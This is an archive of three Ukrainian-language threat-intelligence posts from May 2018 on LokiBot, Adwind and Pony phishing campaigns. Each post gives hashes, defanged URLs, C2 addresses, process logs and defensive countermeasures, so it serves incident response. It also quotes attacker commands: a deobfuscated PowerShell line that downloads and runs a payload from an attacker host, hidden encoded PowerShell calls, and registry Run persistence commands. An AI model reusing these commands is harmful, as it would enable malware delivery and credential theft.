Archive | May 2018

IOC_LokiBot_110518

Доброго вечора, панове.

Сьогодні було зафіксовано чергову розсилку #LokiBot.

Даний тип ШПЗ застосовується для збору інформації та крадіжки облікових даних.

Цього разу, як і 130318, використовували RTF файл із вразливістю 11882.

Рівень загрози – середній.

Для тих, хто врахував наші попередні рекомендації – низький.

Трохи аналітики:

  • Доставка через RTF документи із вразливістю 11882
  • Завантаження основної частини – через процес EQNEDT32.EXE
  • Payload не кодований (This program must be run under Win32)
  • Запуск шкідливого коду не потребує прав Адміністратора
  • RTF файл детектиться модулями ENS, а payload поки що ні

Схема атаки:

email > Attach .doc (RTF) > WINWORD > EQNEDT32.EXE > GET from URL > AppData\Roaming\anydesk.exe

Маркери IOC:

RTF файл:

SHA-256        490dffae713877fb70613e60ea91e72333d19855fb249d2d6666bab4152005be
File name   MV GLORY (V.1460) - EPDA.doc
File size      55.82 KB
>>  h11p://servicelearning.thu{.} edu.tw/quakes.exe

Основна частина:

SHA-256        23b44fa0b535e1dcdcf30e75f622b11b7aa3cae274cf74716d4643de3abe5227
File name   quakes.exe
File size      686.5 KB
>> h11p://nextlevlcourier{.} com/locky/quakes/anel/five/fre.php

Мережеві IOC:

Завантаження основної частини:

140.128.99.228   servicelearning.thu{.} edu.tw        GET /quakes.exe Mozilla/4.0 

З’єднання із C2

91.235.116.153   nextlevlcourier{.} com                 POST /locky/quakes/anel/five/fre.php     Mozilla/4.08 (Charon; Inferno)

Тут ключовий момент – User Agent, який використовує зразок:

POST /locky/quakes/anel/five/fre.php HTTP/1.0

User-Agent: Mozilla/4.08 (Charon; Inferno)

Активність по процесам:

 "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\splwow64.exe 8192

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
"C:\Users\operator\AppData\Roaming\anydesk.exe"
"C:\Users\operator\AppData\Roaming\anydesk.exe"
"C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe"

Закріплення проводить, але з помилкою (якщо payload запускається від імені EQNEDT32.EXE)

anydesk.exe                       File not found: C:\Users\operator\AppData\Roaming/Microsoft/Skype.exe.exe

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Розгортання виправлення вразливості 11882
  • Перевірити можна за допомогою PoC 11882 (embedi)
  • Блокування доступу до мережі Інтернет для процесу EQNEDT32.EXE (варіант 1й)
  • Заборона запуску EQNEDT32.EXE (користувацьке правило Access Protection)
  • Контроль переліку додатків що мають право автозапуску (вбудоване правило Access Protection)
  • Відмов від використання документів типу RTF як застарілого та вразливого формату
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Посилена фільтрація запускних файлів по каналам Web та Email
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

IOC_Adwind_100518

Доброго вечора, панове.

Вчора була зафіксована розсилка шкідливого коду типу #Adwind (RAT).

Ми вже кілька разів розбирали його різні варіації.

#Adwind застосовується для збору інформації та віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі використовують JRE та альтернативні поштові клієнти* чи WebMail, – високий.

А для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Сервер розсилки імітує домен Інституту зварювання ім. Патона
  • (!) актуальні версії MS Outlook по замовчуванню блокують доступ до приєднань цього типу
  • #Adwind не створює нових запускних файлів крім копії модулів JRE
  • Активно використовує WSH та WMI
  • Не потребує прав Адміністратора
  • Може бути каналом доставки іншого malware
  • Цього разу Jar без обгортки

Схема атаки:

email > Attach (jar) > javaw.exe > java.exe > cscript.exe> WMIC.exe > data exfiltration

Маркери IOC:

Основна частина:

SHA-256        8dd7c604013ca7bdabba34ab04291a85ffb9846063de0efb17f8bf2d0a7e04e8
File name   uba.qrypted.jar (18ZJ127 INV (2).jar)
File size      769.07 KB

Мережеві IOC:

Трафік інфікованої системи:

java.exe    1284 TCP   127.0.0.1   49794        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  840   TCP   10.0.2.15   49754        185.227.83.51   5030 ESTABLISHED      

 

java.exe    1284 TCP   APM11       49796        localhost    7777 SYN_SENT                                                                         
javaw.exe  840   TCP   apm11       49754        51.83.227.185.gerber.non-logging.vpn       5030 ESTABLISHED

Активність по процесам:

Коли жертва відкриває JAR файл, відбувається обробка інструкцій і закріплення бекдору:

"C:\Program Files (x86)\Microsoft Office\Office12\OUTLOOK.EXE" /f "C:\Users\operator\Desktop\RE New Order # 014563.msg"
"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\tmp\Temporary Internet Files\Content.Outlook\RBXHTDD1\18ZJ127 INV (2).jar"
"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.96591224716123398063543837287709600.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1028621641851654372.vbs
cscript.exe  C:\tmp\Retrive1028621641851654372.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1863584818779134903.vbs
cscript.exe  C:\tmp\Retrive1863584818779134903.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e
"cmd.exe" /C cscript.exe C:\tmp\Retrive7838850603346017630.vbs
cscript.exe  C:\tmp\Retrive7838850603346017630.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1695544840638860067.vbs
cscript.exe  C:\tmp\Retrive1695544840638860067.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

Таким чином, файли інтерпретатора Java копіюються із \Program Files у каталог профіля користувача.

Після цього проходить закріплення через HKU\Current Version\Run

(!) Зверніть увагу – до списку автозавантаження додається легітимний процес JRE, шкідливі команди передаються параметром:

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OQZJaDzMiFp /t REG_EXPAND_SZ /d
"\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\DUsCXQFVGan\hwDgRthtXax.BDcliA\"" /f

Щоб приховати сліди, Adwind змінює атрибути робочого каталогу:

"attrib" +h "C:\Users\operator\DUsCXQFVGan\*.*"
"attrib" +h "C:\Users\operator\DUsCXQFVGan"

Після закріплення розпочинається збір інформації:

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\DUsCXQFVGan\hwDgRthtXax.BDcliA
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.72519027776652135739829391954449646.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1356326019894555462.vbs
cscript.exe  C:\tmp\Retrive1356326019894555462.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive4827650205509862735.vbs
cscript.exe  C:\tmp\Retrive4827650205509862735.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive5797923481866821519.vbs
cscript.exe  C:\tmp\Retrive5797923481866821519.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive5311907378487770237.vbs
cscript.exe  C:\tmp\Retrive5311907378487770237.vbs
"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Видалення JRE там, де він не є необхідним по роботі
  • Заборона створення/запису .jar файлів у каталозі користувача
  • Блокування доставки файлів типу JAR на рівні Web та Email шлюзів
  • Заборона створення/зчитування vbs файлів або ж повна деактивація механізму WSH
  • Заборонити процесу javaw зчитувати файли з каталогу користувача
  • Суворий контроль переліку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\ – дозволить упередити копіювання файлів JRE
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Pony_030518

Доброго вечора, панове.

Вчора була зафіксована розсилка троянського коду типу #Pony (за альтернативною класифікацією – #Fareit)

Цей тип шкідливого коду застосовується для крадіжки збережених паролів. Ми вже розбирали його варіант 27/02.

Рівень загрози, для організацій котрі не мають оновлень вразливості MS Office 2017-0199, – високий.

Станом на 16:00 4/05 джерело досі активне!

А для тих, хто уважно читає наші поради – низький.

Користувачі захисту кінцевих точок McAfee, зверніть увагу, документ та Payload перехоплюються по DAT.

Трохи аналітики:

  • RTF > 2017-0199 > HTA > PowerShell > EXE
  • Payload не кодований (This program must be run under Win32)
  • Завантаження HTA файлу засобами Winword
  • Завантаження та запуск основної частини відбувається засобами PowerShell
  • Інструкція для PowerShell кодовані, виклик прихований та обфускований (ключі -ex BYPass -NOP -w hiddeN -ec )
  • Payload зберігається і запускається з чітко прописаним іменем і шляхом (AppdAta\carin.exe)
  • Перевірка параметрів системи
  • Спроб закріплень не проводив – запустився, спробував передати і завершив себе
  • Не потребує прав Адміністратора

І так, проблеми будуть у тих, хто:

  • Не застосували виправлення 2017-0199
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • Не заборонили прихований виклик powershell та кодовані команди (більше 50% організацій)
  • Не заборонили трафік для powershell (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

email > Attach (.doc = RTF) > GET ifeoma/htabuk.hta > mshta.exe > Powershell > GET /ifeoma/buk.exe > AppdAta\carin.exe

Файл приманка, справжній тип – RTF

RTF документ містить посилання на HTA файл

Джерело HTA та Payload (станом на 16:00 4/05 досі активне!)

Схема інфікування (включно із winword)

Схема інфікування (тільки powershell)

Маркери IOC:

файл приманка (RTF із вразливістю 2017-0199 )

SHA-256        b2d64492b92ce1d794b9d832b76f91c456f86498d512eb227164a58b6c0d833a
File name   revised invoice.doc
File size      221.6 KB

Ініціює завантаження HTA при відкритті

h11p://dhm-mhn{.} com/ifeoma/htabuk.hta

HTA файл з кодованими інструкціями для PowerShell

SHA-256        ae6a2f89c47aad291662d44db21f6cdd78e649c6027996247779cf02cc13ae5f
File name   htabuk.hta
File size      2.29 KB

Обробка НТА інструкцій викликає завантаження через PowerShell

h11p://www.dhm-mhn{.} com/ifeoma/buk.exe

Основна частина #Pony

SHA-256    c81a6211b9f1fbfc5c0b46151c29879f285a70b7a82d3cf2f262d96865a7fd82
File name   buk.exe    >>    AppdAta\carin.exe
File size      595.5 KB

Забрані паролі публікуються тут

h11p://detailingpro.co{.} in/wp-includes/panelnew/gate.php

Мережеві IOC:

108.167.172.151        dhm-mhn{.} com        Mozilla/4.0          GET /ifeoma/htabuk.hta 
108.167.172.151        dhm-mhn{.} com                                GET /ifeoma/buk.exe 
103.250.185.138        detailingpro.co.in         Mozilla/4.0          POST /wp-includes/panelnew/gate.php

Активність по процесам:

Коли жертва відкриває RTF документ-приманку winword завантажує HTA файл.

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\mshta.exe -Embedding

HTA файл містить кодовані інструкції:

@encoded (base64)

IAAMACAAUwBlAHQALQBDAG8AbgB0AEUAbgB0AAkA…==

@decoded


 � �S�e�t�-�C�o�n�t�E�n�t�       �      �      �-�v�A� � � �(�   �
 � �n�E�w�-�o�B�J�e�c�t� �

@deobfuscated

Set-ContEnt-vA ( nEw-oBJect sYstem.NET.WeBCLiEnT).
DoWNloAdDATa(  h11p://dhm-mhn{.} com/ifeoma/buk.exe)-En
BYTe-PAth   $ENv:aPPDATa\carin.exe ; sTaRt$Env:AppdAta\carin.exe

Обробка HTA призводить до виклику PowerShell який завантажує та запускає основну частину:

"C:\Windows\sysTEM32\WINdOWsPoWeRShELL\v1.0\pOWershElL.eXe"  "  POWerShElL.EXE  -ex  BYPass -NOP -w        hiddeN  -ec        IAAMACAAUwBlAHQALQBDAG8AbgB0AE…

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -ex BYPass -NOP -w hiddeN -ec IAAMACAAUwBlAHQAL…

"C:\Users\operator\AppData\Roaming\carin.exe"

Після запуску зразок намагається з’єднатися із C2, спроб закріплень не проводив

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність наданих вище маркерів
  • Відмова від використання RTF формату як застарілого та вразливого
  • Розгортання виправлень вразливості MS Office 2017-0199
  • Заборона мережевої активності для додатків MS Office та mshta.exe – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборона завантаження HTA файлів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона прихованого виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR